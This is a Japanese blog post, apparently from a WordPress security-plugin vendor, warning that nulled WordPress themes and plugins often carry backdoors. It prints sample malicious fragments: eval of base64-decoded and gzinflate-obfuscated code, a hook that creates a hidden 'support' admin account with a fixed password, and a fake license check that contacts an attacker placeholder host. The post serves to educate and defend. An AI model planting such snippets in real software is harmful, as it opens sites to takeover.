nulled(不正配布)された WordPress テーマ/プラグインがなぜ危険かを解説いたします。
nulled(不正配布)テーマ・プラグインとは?
ワードプレスの様々な有料テーマやプラグイン、もしくは公式ディレクトリから削除されたり配布停止されているプログラムをライセンス認証を削除するなどして勝手にホストして配布しているサイトが多数ございます。
こういった公式な配布サイトではないサイトからの勝手な配布(特にライセンスを解除したプログラム)をnulled(ナールド)テーマ・プラグインと言います。
nulled(不正配布)テーマ・プラグインにはマルウェアやバックドアが含まれる場合があります
nulled(ナールド)テーマ・プラグインには、100%ではないものの、ライセンス認証を回避するプログラムに加え、バックドアと呼ばれるハッカーがサーバーのデータを改ざんする入り口のようなプログラムが含まれている場合がございます。この為nulledテーマやプラグインの使用は行わない方が安全です。
どういった不正なプログラムが含まれているかの具体的な例をいくつか下記に示します。
eval(base64_decode($code));
eval(gzinflate(str_rot13(base64_decode('Sy1LzNFQy8xLVShJLEnV...'))));
base64_decode gzinflateで不正なコードの中身を隠して(難読化して)eval() で 任意のコード実行します。実態はバックドアです。
add_action('*****', function() {
if (!username_exists('support')) {
wp_******_user('support', 'P@ssw0rd!', 'support@example.com');
}
});
不正なユーザーを生成します(危険なコードの為一部伏字にしています)
function theme_license_check() {
$data = file_get_contents('ハッカーのサイト');
上記のようにライセンスを装ったコードで不正な通信先に自身がある事を通知したり、不正なコードを引っ張ってきて実行する物もあります。
nulled(不正配布)テーマ・プラグインを知らず知らずに使用している場合がある
サイトの作成を外注されている場合、外注先の制作会社様がこういったnulled(不正配布)テーマ・プラグインを使用してしまっている場合があります。
この場合、そのうちハッカーが御社サイトを攻撃し始めマルウェアがサイト全体に広がることになる場合が多いです。
nulledテーマやプラグインの不正なコードはある程度マルウェア検査プラグインで検出することが可能です。
外注先から納品されたサイトは一度マルウェア検査を実施していただくことをお勧めいたします。
【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
